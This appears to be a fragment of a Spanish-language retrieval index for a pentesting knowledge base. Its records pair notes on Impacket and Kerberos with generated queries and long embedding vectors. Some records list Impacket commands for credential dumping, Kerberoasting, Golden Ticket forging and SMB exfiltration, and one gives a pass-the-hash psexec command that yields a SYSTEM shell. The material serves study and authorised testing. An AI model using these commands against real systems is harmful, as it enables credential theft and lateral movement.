-0.05717, -0.03251, 0.08479, 0.02036, 0.05014, 0.07953, 0.01578, 0.16585, 0.00242, -0.05775, 0.01264, -0.00021, -0.1744, 0.01872, -0.06248, 0.05327, 0.07547, -0.06061, 0.02751, 0.09626, -0.0877, -0.0717, -0.10574, 0.03162, 0.11066, 0.02701, 0.11046, 0.01067, -0.00503, -0.06379, -0.07432, 0.02028, 0.11323, 0.106, -0.07119, -0.09001, 0.21449, -0.119, -0.17065, -0.01744, -0.05995, -0.05464, -0.05301, -0.00087, -0.0842, 0.00037, -0.00288, -0.14726, 0.07448, -0.0278, -0.05422, 0.00862, -0.00289, -0.09171, 0.12745, 0.01453, 0.02004, 0.03835, -0.0256, -0.00189, -0.0028, 0.01726, 0.16094, 0.0547, 0.01075, 0.07431, 0.01239, 0.06869, 0.01812, 0.1143, -0.05021, -0.01383, 0.03191, 0.09399, -0.0619, -0.00851, -0.09221, -0.05344, 0.06925, 0.10209, 0.10585, 0.01148, 0.06337, 0.04568, -0.10322, -0.08203, -0.00273, -0.12045, 0.09171, 0.0197, -0.01071, -0.10085, 0.06814, -0.02925, 0.02793, 0.03286, 0.00722, -0.06854, -0.02984, -0.06684, 0.07878, -0.10433, 0.00447, -0.05005, 0.07011, -0.02443, -0.01358, 0.07376, 0.08273, 0.03249, -0.10053, -0.00645, -0.11928, 0.07313, 0.06719, -0.00599, 0.08986, 0.00995, -0.03899, 0.0335, 0.04053, -0.06367, -0.05756, -0.04455, 0.00495, 0.01067, -0.03526, 0.03201, 0.00863, 0.06241, 0.00814, -0.02178, -0.03823, 0.06177, -0.02932, -0.00842, -0.10046, 0.01526, -0.03733, -0.02306, 0.04094, 0.02004, 0.15002, 0.00621, 0.01977, 0.05721, -0.05425, -0.01839, 0.0559, -0.03344, 0.01949, -0.01785, 0.06257, 0.03703, 0.0451, -0.05535, -0.01577, -0.01316, 0.03903, -0.00569, 0.03939, 0.05297, -0.03702, 0.01309, -0.09036, -0.05044, -0.05306, 0.03959, -0.05853, 0.11482, 0.00236, -0.07571, 0.02027, -0.0214, -0.01795, 0.03525, -0.01019, 0.03218, 0.03517, -0.01672, -0.02627, -0.02283, 0.00145, -0.01314, -0.00939, -0.01366, -0.06253, -0.02372, -0.01116, -0.06863, -0.00743, -0.0306, -0.04783, 0.10295, 0.05029, -0.01508, -0.00118, -0.01743, 0.12724, 0.07928, -0.05884, 0.12995, 0.01309, -0.01967, -0.00515, 0.03391, -0.03522, -0.06557, -0.04461, 0.09306, 0.05387, 0.01622, 0.00045, -1e-05, 0.00045, 0.03277, 0.06275, 0.0498, 0.00475, 0.02944, 0.05701, -0.07122, -0.04895, 0.10448, 0.02288, 0.04462, -0.02156, -0.13292, -0.00914, 0.05222, 0.06466, -0.03831, 0.00129, -0.00742, 0.00014, -0.05253, -0.00957, 0.00353, -0.03713, -0.06385, 0.01419, 0.01657, -0.0318, 0.03202, -0.08228]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Los mΓ‘s ΓΊtiles\n```\nimpacket-psexec β†’ shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutar comandos sin tocar disco\nimpacket-smbexec β†’ otra ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca NTDS.dit y SAM de un DC en remoto β†’ secretsdump\nimpacket-GetUserSPNs β†’ Kerberoasting\nimpacket-GetNPUsers β†’ AS-REP Roasting\nimpacket-getTGT β†’ pide/forja un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ share SMB falso para exfiltrar a Kali (Transferencia de ficheros)\nimpacket-ntlmrelayx β†’ relay NTLM\nimpacket-ticketer β†’ forja tickets β†’ Golden Ticket\n```", "indexar": "como puedo exfiltrar datos desde un share SMB falso hacia mi maquina local?", "v": [-0.08707, 0.02419, -0.05261, -0.0505, -0.083, -0.0685, -0.16835, -0.06495, -0.16863, -0.03968, -0.03758, -0.03065, 0.15877, -0.11614, 0.04309, 0.02702, -0.00567, -0.14398, -0.03227, -0.05501, 0.02784, -0.09614, 0.0114, -0.18805, -0.02375, 0.01972, -0.03269, 0.0251, -0.17352, -0.08337, 0.17428, 0.0002, 0.03078, 0.00074, 0.03867, 0.03788, 0.06036, -0.01848, 0.06392, -0.06953, 0.12549, 0.01488, -0.09276, -0.0116, 0.01743, -0.0344, -0.11082, 0.00175, -0.03363, 0.08731, -0.06397, -0.09207, -0.10206, 0.04254, -0.14077, -0.12843, 0.0896, -0.15899, 0.09457, 0.01544, -0.07233, -0.06517, -0.04006, 0.04014, 0.01969, -0.0103, 0.09056, 0.05769, -0.05587, 0.05304, -0.06055, 0.12579, 0.06966, -0.07668, -0.0622, -0.1284, 0.12361, 0.00137, -0.0061, 0.03487, -0.02095, 0.00229, 0.07149, 0.03766, -0.01253, 0.05166, 0.04602, -0.10091, 0.01926, -0.02648, -0.03283, 0.09226, -0.01381, 0.05905, 0.03052, 0.03619, 0.00901, -0.01904, -0.07621, 0.02406, 0.0523, 0.00965, -0.02089, 0.09396, 0.04595, 0.02221, -0.00752, 0.02867, -0.01379, 0.05381, -0.00614, -0.00123, -0.09533, 0.00742, 0.06337, -0.07082, 0.01373, 0.00527, 0.037, 0.08119, -0.04056, -0.09285, 0.01022, -0.0602, -0.09291, 0.00372, 0.03289, 0.05002, 0.0305, 0.06387, -0.07172, 0.04012, 0.07239, -0.04408, 0.08514, 0.02557, -0.00682, -0.11325, -0.00635, -0.10179, 0.02126, 0.06387, -0.08606, -0.01593, -0.09936, -0.03486, -0.04906, -0.03152, -0.00225, -0.11948, 0.04124, 0.02968, 0.02724, 0.0704, -0.03282, 0.06581, 0.0662, -0.11259, -0.03432, 0.00644, -0.03108, 0.04056, -0.0509, -0.01035, -0.00483, -0.03445, 0.03376, -0.03078, 0.05515, -0.00949, -0.08967, 0.0971, 0.10449, -0.10474, 0.0884, 0.03961, -0.00295, -0.04113, 0.00904, -0.03396, 0.03924, 0.01387, 0.05161, 0.07815, 0.00599, -0.02282, 0.01552, -0.01932, 0.0276, -0.07019, 0.0272, -0.03513, 0.0897, 0.01033, 0.02785, -0.00158, 0.04356, 0.00165, 0.09076, -0.00056, -0.05616, 0.07891, -0.06893, -0.00951, -0.02027, 0.08298, -0.01055, -0.09505, -0.0284, -0.01123, 0.0322, -0.01961, -0.06513, -0.06991, -0.03331, -0.03003, 0.05609, -0.0306, -0.00901, 0.01636, -0.02581, 0.0327, 0.06295, 0.07239, -0.09159, 0.00433, -0.0323, 0.0001, 0.02092, -0.00391, -0.02194, 0.06565, -0.00811, -0.01032, 0.05133, 0.00433, 0.01252, 0.00402, 0.00686, -0.04736, 0.00827, -0.0374, 0.00633, -0.13299, 0.00328, 0.02736, -0.08001, -0.01476, 0.08533, -0.03947, 0.03874, -0.06387, -0.00655, 0.00693, -0.02426, -0.00931]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "que herramienta puedo usar para ejecutar commands en otro servidor con solo el NTLMHASH?", "v": [-0.03763, 0.02361, -0.11752, -0.16354, 0.00012, -0.08689, -0.09286, 0.00128, -0.00898, 0.08534, -0.20298, 0.00384, 0.10654, -0.02916, -0.01918, 0.09517, 0.11999, -0.18693, -0.02374, 0.05169, -0.04579, 0.02883, -0.07801, -0.00663, -0.07472, 0.0137, 0.04732, -0.00492, -0.20673, -0.01468, -0.0847, -0.01413, 0.01039, -0.03929, 0.02012, -0.05789, -0.06417, 0.04784, -0.01124, 0.20943, 0.04248, 0.14881, -0.07922, 0.10083, 0.03534, 0.01125, 0.00952, -0.08739, 0.08912, -0.07873, -0.00257, -0.06984, -0.18619, -0.0572, -0.01639, -0.08681, 0.18219, -0.12639, -0.03059, -0.09688, -0.14367, -0.07709, 0.00318, -0.05811, 0.03256, -0.01481, -0.04393, -0.10259, -0.08378, 0.03707, -0.16322, 0.06898, 0.02064, -0.02447, 0.05049, -0.00953, -0.01932, -0.01552, 0.10997, 0.07053, -0.02466, -0.03959, -0.12073, 0.04667, -0.12466, -0.11767, 0.01446, -0.04455, 0.06007, 0.00551, 0.04348, 0.04796, -0.07172, 0.02791, 0.07675, -0.01942, 0.0574, -0.04057, 0.0452, 0.01294, 0.17435, -0.03321, -0.0485, 0.07796, -0.02507, 0.03118, 0.06354, -0.02637, -0.00571, 0.01746, 0.09991, -0.0515, -0.01102, -0.00939, -0.05674, -0.03903, -0.01112, -0.05443, -0.00062, -0.03176, -0.02983, 0.02176, 0.00051, 0.04153, 0.04808, -0.08473, -0.00438, 0.05907, -0.03615, -0.06081, 0.00996, -0.05321, -0.01368, -0.02574, -0.01543, 0.04625, 0.04334, -0.10451, -0.06573, -0.10318, 0.05929, 0.04997, -0.04888, -0.00141, 0.08838, 0.02406, 0.01877, -0.10334, -0.02232, 0.01407, 0.13833, -0.05843, -0.05624, 0.01631, -0.08796, -0.02749, 0.02819, 0.01831, -0.09496, 0.04985, -0.00067, -0.00861, -0.00101, 0.06059, 0.02051, -0.05489, 0.0246, 0.01647, 0.02025, 0.06157, 0.04121, 0.04854, 0.01665, -0.02115, 0.02963, -0.09691, -0.06528, -0.01605, -0.02382, -0.02746, 0.02401, 0.03312, -0.02799, -0.02281, 0.00188, -0.03229, -0.01388, 0.00167, -0.04266, 0.06443, -0.01709, 0.09245, -0.01524, -0.02666, 0.0408, -0.01548, 0.01453, -0.03954, -0.0247, -0.05537, -0.04496, 0.01122, -0.03069, -0.07605, 0.03182, 0.00664, -0.07077, 0.07917, -0.01702, 0.02922, 0.0192, -0.02544, 0.09407, -0.01552, -0.04751, -0.01328, 0.03483, 0.00209, -0.01804, -0.0295, -0.00579, 0.02644, 0.04487, -0.02033, 0.01766, 0.0032, -0.00536, -0.01813, 0.02009, -0.01956, -0.01549, 0.00632, -0.02993, -0.03639, 0.00953, -0.04535, 0.02112, -0.02854, -0.02656, -0.06522, -0.00417, 0.06586, 0.02757, -0.04932, -0.03783, -0.05125, -0.04929, -0.0348, -0.06426, -0.01883, 0.00355, -0.0318, 0.05725, -0.04075, -0.0333, -0.00532]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "cual programa me sirve para moverme entre mΓ‘quinas usando autenticaciΓ³n por hash sin reverse shell?", "v": [0.05686, -0.05226, -0.13399, -0.12924, -0.09851, -0.09248, -0.19227, 0.00198, -0.11319, -0.05849, -0.1676, -0.03998, 0.10753, -0.01572, 0.05283, 0.03006, 0.065, -0.09484, -0.01431, 0.04977, 0.05879, -0.03015, -0.03457, -0.14615, -0.03563, 0.12783, 0.0357, 0.06646, -0.24782, -0.13512, 0.00618, -0.06389, 0.13435, -0.02402, -0.02392, -0.00929, 0.0105, 0.00777, 0.10581, 0.11078, 0.0318, -0.0081, -0.16605, 0.12479, 0.14503, -0.03616, 0.06765, -0.01939, -0.02961, 0.02506, -0.02926, -0.01197, -0.11813, 0.03623, 0.02497, -0.13054, 0.07603, 0.00767, -0.03476, -0.05406, -0.07682, 0.04198, -0.07148, 0.01734, 0.04678, -0.05405, 0.05929, -0.08714, -0.08649, -0.0021, -0.03477, 0.06719, 0.10111, 0.01347, -0.05158, -0.00109, 0.0763, -0.03296, 0.02451, 0.0505, -0.04339, -0.0042, -0.0151, 0.05366, 0.03865, 0.00279, 0.05124, -0.08354, 0.09764, 0.03792, 0.00865, 0.09786, 0.01331, 0.06022, 0.11516, -0.02476, 0.02398, 0.01711, -0.01475, 0.01173, 0.09652, -0.04479, -0.02766, 0.11588, -0.06358, 0.06174, 0.0436, -0.03505, -0.02944, 0.09873, 0.06569, -0.02714, -0.03308, 0.01738, -0.03174, 0.00955, -0.05312, 0.00166, 0.00233, -0.07518, -0.03501, 0.0013, 0.02858, -0.02541, 0.08356, -0.00567, 0.01975, 0.12883, -0.05674, 0.04158, 0.07237, -0.01903, -0.02194, -0.02794, -0.0254, -0.05864, 0.14785, -0.03057, 0.01102, -0.04302, 0.08547, 0.1509, -0.04287, 0.00836, 0.01892, 0.01894, 0.0746, -0.08215, -0.02372, -0.02308, 0.02617, -0.02012, 0.04817, 0.06317, -0.08353, -0.0447, -0.00487, -0.02541, -0.15635, -0.01222, -0.10754, 0.00891, -0.04919, -0.02346, -0.02801, -0.00784, -0.01514, 0.06873, 0.06915, 0.04198, 0.00546, 0.02279, 0.09192, 0.05466, 0.05716, 0.07566, -0.03277, 0.00318, 0.02404, -0.03446, 0.02467, -0.0189, 0.09997, -0.02473, -0.02066, 0.03359, -0.02255, 0.05298, -0.01209, 0.01822, 0.01385, 0.01871, -0.07117, -0.04922, 0.03611, 0.05159, 0.0362, -0.03797, 0.08345, -0.0144, -0.03607, -0.00194, 0.01847, 0.02671, 0.02162, 0.08935, -0.04733, -0.09115, 0.04371, 0.0111, 0.02005, 0.04757, -0.01161, 0.08863, -0.01591, 0.01686, -0.04548, 0.03009, -0.02894, 0.01664, -0.04921, -0.06161, -0.03594, 0.05333, -0.03467, -0.06835, 0.04719, -0.002, 0.00555, -0.03614, -0.00032, 0.00703, 0.02882, 0.02988, -0.04164, -0.00335, 0.01403, -0.01362, 0.02758, -0.07697, -0.05353, 0.03732, -0.01688, -0.10679, -0.02616, 0.04611, 0.00437, -0.04216, -0.05186, 0.05495, -0.03852, 0.01212, -0.00578, -0.05036, 0.01646, 0.06361]} +{"tipo": "pregunta", "herramienta": "Impacket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Impacket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Lateral con hash (sin reverse shell nueva)\n```bash\nimpacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20'\n```\nShell SYSTEM en otra mΓ‘quina, autenticado y limpio β†’ Pass-the-Hash, Movimiento lateral.\n\nRelacionado: Mimikatz Β· Active Directory Β· OSCP MOC", "indexar": "con que software puedo acceder a un sistema como SYSTEM solo teniendo el hash de la cuenta de administrador?", "v": [-0.0518, 0.03594, -0.18055, -0.20872, 0.04247, -0.11204, -0.11972, -0.12531, -0.14513, 0.01353, -0.18903, -0.00225, -0.00787, -0.07535, 0.13597, 0.06037, 0.07711, -0.15665, -0.08201, 0.08088, 0.02971, 0.00469, -0.042, 0.0221, 0.03429, 0.05279, -0.00127, -0.05315, -0.17463, 0.0132, 0.04629, -0.02195, 0.05449, -0.04919, -0.06472, -0.02368, 0.01445, 0.12102, 0.03919, 0.08283, 0.01639, 0.01955, 0.00985, 0.04889, 0.11251, -0.03637, -0.0001, -0.05244, 0.05011, -0.0631, -0.11134, -0.04119, -0.20899, -0.13006, 0.08928, -0.13648, 0.05219, -0.04021, 0.02561, -0.03435, -0.04223, 0.09691, 0.02166, 0.02381, -0.0743, 0.02536, 0.09371, -0.04648, -0.04703, 0.11355, -0.05903, -0.00162, 0.02823, -0.02399, 0.04992, 0.08275, -0.02862, 0.03528, 0.01443, -0.01428, -0.0212, -0.08238, -0.05192, 0.05011, -0.08288, -0.12706, 0.00442, -0.09897, 0.03913, -0.02886, 0.03931, -0.04518, -0.01, 0.11827, 0.04136, 0.02005, 0.04838, 0.0165, -0.0772, 0.03078, -0.02817, -0.05233, -0.0446, 0.13851, -0.09689, -0.00659, 0.11063, -0.05875, 0.08065, -0.05937, -0.05046, -0.00306, 0.00135, -0.05822, -0.04631, -0.03931, 0.00203, -0.00111, -0.06955, -0.01169, -0.00134, -0.02375, 0.01778, -0.00203, 0.1439, 0.00255, 0.00641, 0.09325, -0.00654, 0.00801, 0.03206, -0.04855, -0.06097, 0.02823, 0.00338, 0.01055, -0.0759, 0.0299, 0.01588, -0.01702, -0.06097, 0.11356, 0.05054, -0.0857, 0.12844, -0.02879, -0.00099, -0.06972, -0.02855, -0.03644, 0.00148, 0.02015, -0.00906, 0.02714, -0.08597, 0.02996, 0.03868, -0.05394, -0.03197, 0.00656, -0.0311, 0.01501, -0.04975, 0.02429, -0.03213, -0.01014, -0.03905, -0.07308, 0.08281, 0.04502, -0.09365, 0.09191, 0.04034, -0.02278, -0.00713, -0.04417, -0.03208, -0.08835, 0.00978, -0.01025, -0.08977, 0.01683, 0.03165, -0.02719, -0.04044, -0.01326, -0.05806, 0.07016, 0.01872, 0.04635, 0.10968, 0.0855, -0.01904, -0.00098, 0.03186, -0.0031, -0.04164, -0.00495, -0.01344, -0.02688, -0.04715, 0.04103, 0.01355, -0.06628, 0.02794, 0.07807, 0.02207, 0.03696, 0.02045, 0.07042, 0.05191, 0.00571, 0.0834, -0.00463, -0.07927, -0.00504, 0.01569, 0.0126, 0.02352, -0.04037, 0.0292, 0.00385, 0.08447, 0.05305, -0.01504, -0.055, 0.01732, 0.07304, 0.00341, 0.00449, -0.04458, -0.03015, -0.00825, -0.01572, 0.05474, -0.01864, 0.04226, -0.04205, -0.05574, -0.05097, 0.02364, 0.0956, 0.04311, -0.05767, -0.04018, -0.06684, -0.07346, -0.01016, 0.00913, -0.06958, -0.03044, 0.04308, 0.02085, -0.05512, -0.00046, -0.0199]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberos\n\n> El protocolo de autenticaciΓ³n de Active Directory. Entender TGT vs TGS desbloquea media AD.", "indexar": "que programa me ayuda a entender la diferencia entre un TGT y un TGS en Active Directory?", "v": [-0.15037, 0.07953, -0.11572, -0.06931, 0.10826, 0.05829, -0.1601, 0.07708, 0.00737, 0.141, -0.0185, 0.02266, 0.01098, 0.00326, 0.05839, -0.10792, 0.11034, -0.17644, 0.04213, -0.02093, 0.06974, -0.01597, 0.01513, -0.12692, 0.08622, -0.01819, -0.0161, -0.11204, 0.04536, 0.02218, 0.04616, -0.07027, -0.08588, -0.12451, -0.08102, 0.01135, -0.05185, 0.04396, 0.12652, 0.00602, -0.07435, -0.04114, 0.01621, 0.09189, 0.11745, 0.03842, 0.05764, 0.00022, 0.0381, -0.03431, -0.13212, -0.01418, 0.02988, -0.10129, 0.00061, -0.0475, 0.07447, -0.06434, -0.13262, -0.03308, -0.05671, -0.11387, -0.07851, -0.07461, 0.00803, -0.08178, 0.14066, -0.0848, -0.11147, 0.05881, -0.1066, 0.02493, 0.01265, -0.04291, -0.01715, -0.0089, 0.06708, 0.03611, -0.03219, -0.02533, 0.08182, 0.03473, 0.00627, 0.11016, -0.04867, -0.0996, 0.00412, -0.0358, -0.03034, -0.05034, -0.00667, 0.14099, -0.08596, 0.09882, 0.01613, 0.03167, 0.07465, 0.01199, 0.08602, 0.05807, 0.05382, -0.10413, -0.02816, 0.05511, -0.02152, 0.09635, 0.03428, 0.0134, -0.16293, 0.13014, 0.06318, 0.03472, 0.05014, -0.03213, -0.03722, 0.0694, -0.04392, -0.00097, 0.06, -0.02872, -0.08634, -0.00501, 0.02142, 0.03144, 0.07882, 0.0202, -0.04976, 0.13233, -0.05559, 0.12344, 0.00714, 0.09638, -0.06255, -0.09142, -0.00781, -0.05627, 0.02521, -0.00257, 0.0381, -0.04488, 0.01422, 0.01146, 0.05482, 0.05115, 0.02346, -0.05111, 0.02732, -0.02676, -0.03266, 0.1035, 0.02404, -0.01379, 0.02197, -0.03649, 0.02133, -0.04261, -0.01265, -0.07541, -0.01645, 0.01476, -0.02291, 0.01098, -0.00697, -0.15384, 0.01287, -0.06761, -0.09567, 0.01884, 0.06918, 0.03987, 0.00375, 0.03541, 0.02221, -0.05259, -0.05538, -0.04852, 0.0129, -0.06338, 0.01796, -0.01072, -0.04816, -0.00533, -0.02878, -0.00495, -0.00324, -0.00774, -0.06097, -0.05899, -0.04931, -0.01172, -0.01218, 0.05492, -0.00046, -0.07527, -0.07592, -0.02958, 0.05124, -0.00849, 0.07396, -0.02786, -0.02749, -0.02483, 0.06304, -0.04266, 0.03365, 0.03691, -0.07559, 0.11877, 0.09587, 0.04632, 0.01339, -0.00733, 0.02457, 0.03306, -0.08017, 0.05313, -0.01579, 0.09733, -0.01503, 0.03694, -0.03598, -0.01078, 0.03351, 0.05056, -0.0193, -0.08041, 0.08562, -0.00907, -0.01334, 0.0623, 0.00754, -0.05033, 0.0998, -0.04707, -0.01628, 0.05646, -0.01504, -0.01872, -0.00981, -0.04573, 0.04662, 0.05678, 0.0365, 0.01329, 0.02059, -0.00383, -0.04634, 0.0132, -0.03285, -0.0098, -0.06022, 0.00835, 0.01726, -0.03701, -0.02323, 0.06046]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kerberos\n\n> El protocolo de autenticaciΓ³n de Active Directory. Entender TGT vs TGS desbloquea media AD.", "indexar": "con que herramienta puedo explicar el funcionamiento del protocolo Kerberos para Active Directory?", "v": [-0.06429, 0.07662, -0.11822, -0.26548, -0.01082, -0.23057, 0.03463, 0.09329, -0.12386, -0.02764, -0.00831, -0.0051, 0.00185, -0.18938, 0.13673, -0.0414, 0.04228, -0.14047, -0.02558, 0.00367, 0.01046, 0.09442, -0.1313, 0.00431, 0.0229, 0.07064, 0.00932, -0.05708, -0.09833, -0.00244, 0.02272, 0.0247, 0.05881, -0.08078, -0.01099, -0.01091, -0.11387, 0.09303, 0.03717, 0.13211, -0.17519, 0.00198, -0.05281, 0.11868, 0.05431, 0.07994, -0.02552, -0.13789, 0.02928, 0.03869, -0.0134, -0.14039, -0.06815, 0.00904, -0.00511, -0.04491, 0.09541, -0.11105, 0.01227, -0.1141, -0.01451, -0.11167, -0.08542, -0.03183, -0.04351, -0.14794, 0.10246, -0.06971, -0.10174, 0.0307, -0.01426, 0.04321, 0.0254, 0.11161, 0.06222, 0.00164, -0.01939, 0.00902, -0.02785, 0.11805, 0.02917, 0.05097, 0.03435, 0.11189, -0.08583, -0.09784, 0.02428, -0.05065, 0.02398, -0.1243, -0.06323, 0.07805, -0.05986, 0.02254, 0.04137, -0.01441, -0.02178, 0.05415, 0.05951, 0.01802, 0.08049, -0.05205, -0.06054, 0.06712, 0.03111, 0.05291, -0.02559, 0.05097, -0.03633, -0.05719, -0.03595, -0.01081, 0.01999, -0.05827, -0.01723, 0.1588, -0.11317, -0.03129, -0.00663, 0.04027, -0.06017, 0.05101, -0.01858, -0.00149, 0.02598, -0.00503, -0.02697, 0.15829, 0.04624, 0.02666, -0.00507, 0.0312, -0.03651, -0.0308, -0.05511, -0.00869, -0.06821, -0.0236, -0.07775, -0.07747, -0.03239, 0.01707, -0.04565, 0.00077, 0.03925, -0.07345, 0.06405, 0.02131, -0.05699, 0.06143, 0.03029, 0.02491, -0.06317, 0.00061, -0.04954, 0.03082, 0.00133, 0.01386, -0.05565, 0.02212, -0.05821, -0.04933, 0.05264, 0.0177, 0.00739, 0.00649, -0.06975, -0.09229, 0.07606, 0.08972, 0.04905, 0.04833, 0.06813, -0.01939, -0.04602, -0.02455, -0.03219, -0.00903, 0.04299, -0.06174, -0.00152, 0.05259, -0.02368, -0.02164, 0.01541, -0.0249, 0.04001, -0.02142, 0.00907, -0.00525, 0.01397, 0.03111, 0.02821, -0.02615, -0.0338, -0.01449, 0.01909, -0.0459, 0.01112, -0.06907, 0.01454, 0.03985, 0.05829, -0.03631, 0.04811, 0.08934, -0.06982, 0.03014, -0.01329, 0.04278, 0.04744, -0.04123, 0.08359, 0.01519, -0.07887, 0.00745, -0.01778, -0.00943, -0.03349, -0.04737, 0.05228, 0.03685, 0.04636, -0.01325, 0.01869, -0.01245, 0.01087, 0.0129, 0.04058, -0.01241, -0.03392, 0.00728, 0.00057, -0.00164, 0.03546, 0.01341, 0.00177, -0.0241, -0.07767, -0.01631, 0.00522, 0.06933, -0.00818, -0.0042, -0.03446, -0.04973, -0.0317, -0.01588, -0.02514, -0.04991, -0.01684, -0.02511, 0.04109, -0.04099, -0.01503, -0.06151]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "ΒΏcΓ³mo hago un ticket para acceder a un servidor de archivos?", "v": [-0.1642, -0.046, -0.006, -0.12354, 0.01625, -0.1522, 0.01143, -0.02405, 0.08656, 0.0148, -0.21753, -0.06671, 0.02549, 0.05845, 0.06294, 0.01881, 0.25075, -0.05263, 0.11759, 0.05171, 0.02261, 0.162, 0.06583, 0.0179, -0.03663, -0.07567, 0.07992, 0.0854, -0.12684, -0.10222, -0.03, -0.12617, 0.00985, 0.00368, 0.02769, 0.03307, 0.09876, 0.1732, -0.05924, 0.00922, 0.0293, 0.00901, -0.04632, 0.07156, -0.05188, -0.10295, 0.06094, 0.01493, 0.03748, -0.03536, -0.06698, -0.07958, -0.0864, 0.0771, -0.08178, 0.03941, 0.004, -0.1424, 0.08605, -0.0203, -0.1586, 0.01667, -0.06886, 0.01093, -0.07963, 0.02508, -0.01037, -0.01835, -0.05927, -0.03325, -0.14391, 0.01198, 0.03961, 0.00336, 0.00892, 0.07886, 0.06684, -0.11686, 0.03741, 0.04376, 0.12222, 0.04129, -0.03816, 0.04074, -0.03913, -0.09833, 0.0537, -0.00491, 0.01822, 0.09413, 0.09459, 0.07283, -0.0493, 0.0245, -0.02006, -0.12337, 0.0289, -0.11054, -0.06421, -0.04646, -0.06414, 0.05377, -0.01399, 0.08181, 0.00072, 0.10482, 0.0754, -0.01577, -0.02445, -0.04301, 0.05391, 0.05458, -0.10074, 0.10134, -0.08314, 0.00424, 0.04666, 0.01181, 0.01338, 0.04726, -0.07267, 0.05117, 0.05701, -0.06321, 0.05565, -0.04616, 0.05951, 0.07199, -0.01579, 0.00963, 0.02874, 0.047, -0.07779, 0.03707, -0.06291, 0.00191, 0.06881, -0.01783, -0.03922, 0.01391, 0.0863, 0.01174, -0.00282, 0.04781, 0.12539, -0.00982, 0.01196, -0.04421, -0.10289, -0.03376, -0.00909, -0.08095, -0.01825, 0.00899, -0.07279, 0.03471, 0.03658, -0.12711, -0.09331, 0.04405, 0.01117, 0.05255, -0.03026, 0.07873, 0.02118, -0.01992, -0.01771, 0.0332, 0.04248, 0.02499, -0.00527, 0.02794, -0.02115, -0.02222, 0.01503, 0.00073, -0.07663, -0.06057, 0.05506, 0.01645, 0.03037, -0.04492, -0.01665, 0.04487, -0.03896, -0.05413, 0.08068, -0.04045, -0.00287, 0.0951, 0.02345, 0.01401, -0.04669, 0.02921, -0.02112, -0.06022, -0.08398, -0.04816, -0.05912, -0.01199, -0.01647, -0.02986, -0.01396, 0.02541, 0.04538, -0.046, -0.05575, -0.01181, 0.03279, 0.0214, -0.00733, 0.01199, 0.12764, -0.04497, -0.00261, 0.00078, 0.0352, -0.02394, 0.01536, -0.03046, 0.03238, 0.03649, 0.0085, -0.00217, 0.0203, -0.00154, 0.02762, -0.03773, 0.064, -0.01015, 0.00848, 0.04081, -0.03468, 0.03149, 0.02605, -0.00727, 0.01234, -0.05007, -0.08721, -0.0521, 0.04436, 0.09457, 0.02796, -0.00609, -0.03672, -0.05029, -0.0227, -0.00608, -0.03024, 0.01323, 0.03076, -0.04967, 0.01418, 0.02277, 0.04002, -0.03884]} +{"tipo": "pregunta", "herramienta": "Kerberos", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## En 30 segundos\n```\nUsuario --(ΒΏpwd?)--> KDC (Domain Controller)\nUsuario <--(TGT: \"carnet maestro\")-- KDC\nUsuario --(TGT + \"quiero \\\\fileSrv\")--> KDC\nUsuario <--(TGS: ticket para fileSrv)-- KDC\nUsuario --(TGS)--> fileServer \"este ticket prueba que soy yo\"\n```", "indexar": "quΓ© programa genera tickets Kerberos para un dominio", "v": [-0.13093, -0.1289, 0.0532, -0.12552, -0.08861, -0.10607, 0.10374, 0.07723, -0.09318, -0.1137, -0.04935, -0.03948, -0.02324, -0.18564, 0.1032, -0.02296, 0.11841, -0.04098, 0.19171, -0.01431, -0.04357, 0.0623, 0.06802, -0.07485, -0.01253, -0.08225, 0.04943, -0.10086, 0.04903, 0.16273, 0.01835, -0.04961, 0.03615, -0.13403, -0.00889, -0.03017, -0.0132, 0.16126, 0.08478, 0.05373, 0.01366, -0.01963, -0.02297, 0.08092, -0.04872, -0.04285, -0.01552, -0.02142, 0.03147, -0.21881, 0.0503, 0.00238, 0.00316, 0.0143, 0.12023, -0.14162, -0.02948, -0.21285, -0.10753, 0.0408, -0.03613, -0.10184, 